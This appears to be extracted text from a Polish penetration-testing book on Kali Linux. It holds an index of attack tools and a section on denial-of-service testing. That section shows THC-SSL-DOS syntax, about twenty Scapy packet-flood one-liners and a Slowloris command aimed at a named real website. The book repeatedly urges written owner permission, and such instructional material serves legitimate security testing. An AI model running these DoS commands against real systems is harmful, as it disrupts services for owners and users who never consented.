sprz towe 40narz dzia dost pne
w systemie 46Network Install 40proces konfigurowania
partycji dysku 42publiczny adres IP 225s owniki 129
uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39
wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147
aplikacji internetowych 169191
HTTP 262klonowanie
rodowiska 278witryny internetowej 66 153
158 251 279klucze uruchamiania systemu
171 173komunikaty
ICMP 70o up ywie czasu dania 70
kopiowanie plikoacutew SAMi SYSTEM z hosta 172
LLinux amanie hase 173lista
adresoacutew URL 227potencjalnych hase 185
listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263
tryby 266luki w zabezpieczeniach
aktualizacja bazy 276aplikacji internetowych 245
254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty
elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92
LVM 43
Kup książkę Poleć książkę
Skorowidz
332
adunek 117amanie hase 137 169
bezp atne us ugi sieciowe190
haszowanych 189maska 189narz dzia 174przechowywanych w plikach
systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper
174zabezpieczaj cych BIOS
komputera 190cza modyfikacja 196
MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74
zadania 76Maltego CaseFile 326man-in-the-middle 139 211
obrona przed atakiem 281przeprowadzanie manualne
212maska 189mechanizmy
HSTS 140klonowania 153obronne 231 271
testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego
po czenia SSL 257usuwania mi kkich b doacutew
404 93mened er LVM 43metadane 83
wyszukiwanie i analiza 83Metasploit 113 154
skanowanie sieci lokalnej 114wersja konsolowa 114
meterpreter 151uruchomienie sesji 156wykorzystanie 156
metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24
310 323metody
pojedynczegouwierzytelniania 194
szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem
Windows 172
Nnag oacutewki X-Frame-Options 287narz dzia
do klonowania witryn 281do amania hase 174do przechwytywania sesji
198do przeprowadzania atakoacutew
DoSDDoS 285ledcze 295
wspomagaj ce tworzenieraportoacutew 325
nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228
nazwy DNS 71Nessus 162
HomeFeed 163instalowanie w systemie
Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164
Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe
263Nmap 76
agresywne skanowanie 79graficzny interfejs
u ytkownika 77okno wynikoacutew skanowania 82opcje 79
NoScript 287no niki danych 288
Oobrona przed atakami
Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek
286SSLstrip 284
ocena ryzyka 30formu y 31okna serwisowe 277
ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183
uruchomienie w Kali Linux184
osobista weryfikacja to samo ci194
oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu
poufno ci 307otwarta implementacja sterownikoacutew
kart graficznych 178Owasp-Zap 105 245
automatyczne logowanie 110konfigurowanie przegl darki
108mechanizm aktualizacji ca ego
pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111
PPAE 39pakiety
ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259
pami masowa urz dze 289partycje 172
wymiany 291Pasco 299Password Attacks 37 47 174Patator 229
Kup książkę Poleć książkę
Skorowidz
333
pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki
binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180
wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie
299poczta elektroniczna 123
fa szywe wiadomo ci 159podatno na atak 29
aktualizacja bazy 276aplikacji internetowych 245
254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226
podnoszenie uprawnie 37podstawowe wymogi
bezpiecze stwa 303podsumowanie ustale 313polecenia
apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70
getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116
polityka zarz dzania has ami 277po czenia
HTTP 268HTTPS 268
po czeniaTCP 267troacutejetapowe 79VPN 282
poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276
porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142
poufno 30poziom zabezpiecze
minimalny 274podstawowy 274
PREROUTING 143
Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty
Emily 59Gruyere 224 246
promiscuous mode 47Protocol Attacks 256protoko y
8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281
ProxyStrike 98robot sieciowy 100
przechwytywanieciasteczek 197 209 286danych logowania
u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych
w sieci 217pakietoacutew 213
sieciowych 210TCP 259
przechwytywaniepo cze 161
TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267
270sesji 197 208 233
narz dzia 198przegl d projektu 306przegl darki 232
ochrona przed atakami 236zabezpieczenia 249
przekazywanie pakietoacutew IP 142212
przekierowaniepo cze 284portoacutew komunikacyjnych
142ruchu sieciowego 141sesji 284
przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173
Kup książkę Poleć książkę
Skorowidz
334
RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy
b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce
tworzenie 325o wiadczenie o zachowaniu
poufno ci 307podatno ci i luki
w zabezpieczeniach 315podsumowanie ustale 313
zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury
testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje
dla rodowiska sieciowego316
wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami
dokumentacji 308zgodno ze standardami
i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316
powykonawcze 28rekonesans 34 51
badanie zasoboacutew siecikomputerowych 65
Google hacking 61
Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy
adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u
ICMP 69z wykorzystaniem serweroacutew
DNS 71zadania 52zasoby serwisoacutew
spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54
rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia
zdarzenia 31rootkit 295rozsy anie spreparowanych
pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206
adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285
SSAM 171samdump2 178Scalpel 299
Scapy 257 259scenariusze atakoacutew 260
security assessment 21security audit 21serwery 91
aplikacji internetowych 92223zabezpieczanie 136 249
atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236
wykorzystanie 238Samba 116sieciowe 91WWW 262
serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71
serwisy spo eczno ciowe 58sesja 195
ciasteczka 197logowania 205mechanizmy bezpiecze stwa
195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249
adres IP sklonowanej witryny158
aplet Java 156Credential Harvester Attacks
157Exploit to deliver 154importowanie w asnych
plikoacutew witrynyinternetowej 158
IP addresshostname forreverse connection 154
mechanizmy chroni ceprzeprowadzany atak 155
NATPort forwarding 154przechwycenie nazw kont
i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych
wiadomo ci 159URL you want to clone 154
Kup książkę Poleć książkę
Skorowidz
335
uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku
z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery
biometryczne 194stron internetowych 246
skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u
ICMP 70Skipfish 95
raport 97s owniki 96
skryptyopakowuj ce 228wykrywanie
nieautoryzowanychskryptoacutew 287
XSS 224 226SLE 31Slowloris 261s owa kluczowe
dbs 222FUZZ 133 135tables 222
sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata
31sqlmap 221SSL stripping 140SSLstrip 140 197 211
konfigurowanieprzekierowania portoacutew 142
mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141
SSO 194
standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293
baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy
BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia
i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231
szablony witryn 251szare pude ko 24szyfrowane po czenia
https 197VPN 282
Ttablice t czowe 170 189
amanie hase systemuWindows 183
Tamper Data 125TCPReplay 270Tenable 163testowanie
dzia ania roacute nych urz dzesieciowych 270
mechanizmoacutew obronnych 273odporno ci na przeci enia
268podatno ci na ataki XSS 224sklonowanego rodowiska
279testy
o nieograniczonym zakresiedzia ania 26
odporno ci na przeci eniesystemu 256
warunkoacutew skrajnych 256
testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu
zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu
Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33
THX-SSL-DOS 257tokeny 194
sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259
Uumowy
oczekiwania klienta 317potencjalne problemy
i zagadnienia 324rozliczane wed ug zu ycia
czasu i zasoboacutew 305wykaz prac 319ze sta cen 304
unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi
NAT 251profesjonalne 304w chmurze 211
usuwanie ladoacutew w amania 38utrzymanie zdobytego
przyczoacute ka 37uwierzytelnianie 193
ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193
Kup książkę Poleć książkę
Skorowidz
336
VVega 101
modu serwera proxy 104zestawienie znalezionych
podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32
Ww3af 120
wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122
w3mir 281warto
ryzyka 32sumy kontrolnej 293zasobu 31
WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92
obs uga programu 93raport 95
WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132
Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171
ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie
plikoacutew 172partycja systemu 172uzyskanie dost pu do
systemu 180Windows Reverse_TCP
Meterpreter 154Wireless Attacks 47Wireshark 206
filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie
ciasteczek 198kodu 248
kodu SQL 218pakietoacutew 228skryptoacutew 223
wtyczki przegl darki Firefox 198wykaz prac
dodatkowe elementy 323dodatkowe uzgodnienia
prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania
i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy
penetracyjne 321wykorzystywanie
b doacutew w zabezpieczeniachprzegl darki 196
exploitoacutew 92luk w zabezpieczeniach 113
254systemoacutew poczty
elektronicznej 123zidentyfikowanych
podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie
luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92
wytyczne 28 304
XXSS 223
aplikacje internetowe 248testowanie podatno ci 224
XSS cookie stealing 225
Zzabezpieczanie
serweroacutew aplikacjiinternetowych 249
systemoacutew pod czonychdo internetu 271
zakres prac 319cel testu 33definicja
przestrzeni celoacutew 27systemoacutew 26
zdobycia flagi 28dokument 25identyfikacja obszaroacutew
krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o
planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby
prze amywaniazabezpiecze 27
rekomendacjepowykonawcze 28
specyfikacja raportuko cowego 28
ZAP 236 245obrona przed zdalnymi
atakami 249Zaproxy 105zarz dzanie
aktualizacjami 275poprawkami zabezpiecze
275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308
zasoby sieciowe odpornona przeci enie 263
zatarcie ladoacutew penetracji systemu38
zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125
Host details 81Zero-day 275zewn trzny dysk USB 292zmienne
LHOST 118RHOST 117
znaczniki czasu 172zrzut okna 327
daniaForm 131mapowanie 24
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
256
i nie zwraca uwagi na to czy jego dzia ania spowoduj zak oacutecenia w funkcjonowaniu atako-wanego systemu je eli tylko takie post powanie b dzie dla niego korzystne Czasami zdarzasi nawet e napastnik b dzie wr cz za wszelk cen szuka mo liwo ci zak oacutecenia dzia aniaczy nawet ca kowitego wy czenia atakowanego systemu Z tego powodu w niektoacuterych przypad-kach przeprowadzenie testoacutew odporno ci danej witryny czy aplikacji internetowej na ataki typuDoS (ang Denial of Service) mo e by bardzo po dane Testy tego rodzaju cz sto s nazywanetestami warunkoacutew skrajnych lub testami odporno ci na przeci enie systemu (ang stress testing)
Jedn z najwa niejszych spraw zwi zanych z testami odporno ci na ataki typu DoS jest bezwzgl dne uzyska-nie pisemnej zgody w a ciciela systemu na przeprowadzanie takich atakoacutew Niektoacutere metody atakoacutewmog mie negatywny wp yw na funkcjonowanie systemu nawet po zako czeniu testoacutew Dobrym roz-wi zaniem jest przeprowadzanie takich testoacutew na systemach z redundancj systemach nieprodukcyj-nych czy systemach zainstalowanych w rodowisku laboratoryjnym o ile to oczywi cie mo liwe
Najcz ciej spotykana metoda ataku DoS polega na bdquozalewaniurdquo badanego systemu masowonap ywaj cymi z zewn trz daniami Takie przeci enie zazwyczaj skutecznie uniemo liwiasystemowi odpowiadanie na rzeczywiste dania od autoryzowanych klientoacutew lub co najmniejtak spowalnia wysy anie odpowiedzi e ca y system staje si dla klientoacutew praktycznie bezu-yteczny Ataki typu DoS mog by skierowane na zasoby systemu (np przypisana przestrze
dyskowa przepustowo po cze sieciowych itd) konfiguracj systemu (np usuwanie tablicroutingu) informacje o stanie systemu (np resetowanie sesji TCP) oraz ka dy inny elementrodowiska systemu ktoacuterego przeci enie mo e spowodowa zak oacutecenie jego normalnego
funkcjonowania
Roacute nica pomi dzy atakami DoS (ang Denial of Service) a DDoS (ang Distributed Denial of Service) polega natym e do przeprowadzania ataku DoS napastnik wykorzystuje tylko jeden komputer podczas gdy w przy-padku atakoacutew DDoS liczba maszyn bior cych udzia w ataku mo e si ga tysi cy Omawianie zagadniezwi zanych z atakami DDoS wykracza niestety daleko poza ramy naszej ksi ki
Istniej cztery g oacutewne kategorie atakoacutew DoSDDoS Ataki wykorzystuj ce przeci enie po cze sieciowych (ang Volume Based
Attacks) mdash taki rodzaj ataku jest zwi zany z bdquozalewaniemrdquo atakowanego systemumasowo nap ywaj cymi pakietami UDP ICMP i innymi Celem takiego ataku jestprzeci enie po cze sieciowych atakowanego systemu nadmiernymi ilo ciamiprzesy anych pakietoacutew
Ataki na protoko y komunikacyjne (ang Protocol Attacks) mdash ataki te maj na celunadmierne wykorzystywanie zasoboacutew urz dze sieciowych takich jak routeryzapory sieciowe urz dzenia roacutewnowa ce obci enie po cze sieciowychPrzyk adami atakoacutew na protoko y komunikacyjne s ataki typu SYN floodPing of Death Smurf Teardrop wymuszanie fragmentacji pakietoacutew itp
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
257
Ataki na warstw aplikacji (ang Application Layer Attacks) mdash takie ataki wykorzystujnormalny ruch sieciowy do zak oacutecenia dzia ania lub nawet spowodowania awariidanej witryny lub aplikacji internetowej Przyk adami mog by ataki typu Zero-Dayczy ataki wykorzystuj ce inne podatno ci i luki w zabezpieczeniach witryn i aplikacjiinternetowych
Ataki powoduj ce wyczerpanie zasoboacutew sesji (ang Session Exhaustion) mdash takieataki powoduj wyczerpanie liczby dozwolonych jednocze nie sesji poprzez ci g enawi zywanie nowych po cze bez zamykania starych sesji co prowadzido wyczerpania zasoboacutew systemu
W systemie Kali Linux znajdziesz wiele narz dzi pozwalaj cych na wykorzystywanie podat-no ci i luk w zabezpieczeniach Narz dzia te na przyk ad Metasploit mog by u ywane doprzeprowadzania atakoacutew DoS na warstw aplikacji (wiele z tych narz dzi omawiali my ju wewcze niejszych rozdzia ach) W rozdziale 3 prezentowali my popularne narz dzie Scapypozwalaj ce na przeprowadzanie atakoacutew DoS na protoko y komunikacyjne Poni ej znaj-dziesz omoacutewienie kilku kolejnych narz dzi s u cych do przeprowadzania atakoacutew DoS ktoacuteremo esz znale w systemie Kali Linux
Aby przetestowa skuteczno ataku DoS mo esz u y witryny httpwwwupordownorg ktoacutera sprawdzadost pno podanej witryny internetowej
THX-SSL-DOSProtokoacute SSL (ang Secure Socket Layer) jest u ywany do nawi zywania bezpiecznych po -cze i transakcji w internecie Nawi zanie bezpiecznego po czenia z wykorzystaniem proto-ko u SSL wymaga u ycia po stronie serwera 15 razy wi kszej mocy obliczeniowej ni po stro-nie klienta Atak typu THC-SSL-DOS wykorzystuje t dysproporcj przez proacuteb prze adowaniaserwera spreparowanymi daniami nawi zania sesji SSL a do momentu kiedy przeci onyserwer si poddaje i przestaje odpowiada na dania przesy ane od innych autoryzowanychklientoacutew Atak wykorzystuje mechanizm renegocjacji bezpiecznego po czenia SSL do gene-rowania tysi cy takich da dla pojedynczego po czenia TCP Z tego powodu atak ten jestroacutewnie znany jako atak typu SSL-Exhaustion (ang mdash bdquowyczerpanie zasoboacutew SSLrdquo) Zalettakiego podej cia jest to e mo liwo ci przetwarzania da nawi zania sesji SSL s znaczniewy sze po stronie klienta co oznacza e przeci tny laptop pod czony do sieci za po red-nictwem cza o przeci tnej szybko ci mo e rzuci powa ne wyzwanie niemal ka demu serwero-wi aplikacji internetowych Podatno serweroacutew internetowych na ataki typu SSL-Exhaustionjest powszechnie znana a mimo to nie uda o si jeszcze opracowa skutecznej metody zapo-biegania takim atakom
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
258
Aby uruchomi pakiet THC-SSL-DOS w menu g oacutewnym systemu przejd do grupy Kali Linuxa nast pnie wybierz polecenie Stress TestingWeb Stress Testingthc-ssl-dos Po wybraniu pole-cenia pojawi si nowe okno terminala z ekranem powitalnym polecenia thc-ssl-dos Sk adniapolecenia jest nast puj ca
thc-ssl-dos [opcje] ltadres IP ofiarygt ltportgt and --accept
W wierszu wywo ania polecenia musisz umie ci opcj --accept w przeciwnym wypadku otrzymaszkomunikat o b dzie przedstawiony poni ej
Po uruchomieniu programu THC-SSL-DOS zobaczysz na ekranie kilka zabawnych komuni-katoacutew informuj cych e dzia anie programu si rozpocz o Na pierwszym rysunku zamiesz-czonym poni ej wida e zaatakowana witryna nie obs uguje protoko u SSL st d programwy wietla na ekranie komunikat o wyst pieniu b du Na kolejnym rysunku przedstawionosytuacj w ktoacuterej pomy lnie rozpocz si proces renegocjacji sesji SSL co w efekcie mo edoprowadzi do zak oacutecenia dzia ania atakowanego systemu Pami taj ataki tego typu mo eszprzeprowadza tylko na systemach dla ktoacuterych uzyska e pisemne zezwolenie w a cicielaPrzeprowadzenie takiego ataku mo e doprowadzi do powa nego ograniczenia funkcjonalno-ci atakowanego systemu lub nawet do jego ca kowitego za amania
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
259
ScapyJednym z najpopularniejszych narz dzi s u cych do przeprowadzania atakoacutew typu DoS jestScapy Program zosta napisany w j zyku Python a jego autorem jest Phillippe Biondi Scapypozwala na tworzenie modyfikowanie i dekodowanie zawarto ci pakietoacutew sieciowych wstrzyki-wanie pakietoacutew do sieci przechwytywanie pakietoacutew oraz dopasowywanie da i odpowiedziProgram posiada roacutewnie wiele innych mechanizmoacutew takich jak skanowanie portoacutew traso-wanie pakietoacutew sprawdzanie urz dze sieciowych przeprowadzanie atakoacutew czy wykrywanieurz dze sieciowych
Jedn z cz sto wykonywanych operacji jest przechwytywanie pakietoacutew TCP i wysy anie ichdalej do sieci za po rednictwem programu Scapy Aby uruchomi ten program w oknie ter-minala wpisz polecenie scapy Po uruchomieniu programu b dziesz moacuteg wykonywa pole-cenia bezpo rednio z jego wiersza polece
W przyk adzie ktoacutery przedstawiamy poni ej sproacutebujemy u y pakietu Scapy do wysy aniaspreparowanych pakietoacutew TCP do naszego serwera testowego W naszym przypadku serwertestowy ma adres IP 10001 ale w realnym scenariuszu mo e to by dowolny router czyserwer WWW Oproacutecz podania adresu atakowanego serwera musimy roacutewnie okre li liczbpakietoacutew ktoacutere zostan wys ane do celu W naszym przypadku b dzie to 2000 pakietoacutew cze-go mo emy dokona za pomoc nast puj cego polecenia
send(IP(dst=10001ttl=0)TCP()iface=eth0count=2000)
Powoduje ono wys anie 2000 pakietoacutew z interfejsu sieciowego eth0 do serwera o adresie10001 Jak zapewne zauwa y e czas ycia wysy anych pakietoacutew (parametr ttl) jest ustawio-ny na warto 0 Z punktu widzenia protoko u TCP istnienie takich pakietoacutew jest niemo liweInaczej moacutewi c wysy aj c pakiety z tak spreparowan warto ci parametru ttl proacutebujemywprowadzi atakowany serwer internetowy co najmniej w zak opotanie W realnym scenariu-szu potencjalny napastnik wysy a by do atakowanego serwera miliony takich pakietoacutew Wartozauwa y e w sprzyjaj cych okoliczno ciach zak oacutecenie pracy czy nawet powa na awaria serweramo e by spowodowana odebraniem nawet jednego niepoprawnego czy specjalnie z o liwiespreparowanego pakietu sieciowego Oczywi cie w zale no ci od zamiaroacutew mo esz dowolniemodyfikowa poszczegoacutelne opcje wysy ania pakietoacutew
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
260
Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy
Nieprawid owa wersja protoko u IP
send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)
Nieprawid owa suma kontrolna pakietu TCP
send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)
send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)
send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)
Ustawiona tylko flaga FIN
send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)
Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2
send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka pakietu
send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)
ICMP Flood
send(IP(dst=10001)ICMP()iface=eth0count=2000)
Nieprawid owa suma kontrolna pakietu IP
send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)
Fragmentacja pakietoacutew IP
send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
261
roacuted owy adres IP taki sam jak docelowy adres IP
send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)
Brak pakietu warstwy L4
send(IP(dst=10001 src=10203040) iface=eth0 count=2000)
Jednocze nie ustawione flagi SYN i FIN
send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)
Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)
Slowloris
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
262
Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym
programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco
czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera
Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne
Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris
Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej
perl slowlorispl
W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)
perl slowlorispl -dns thesecuritybloggercom
Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)
Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)
Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
263
LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
264
narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki
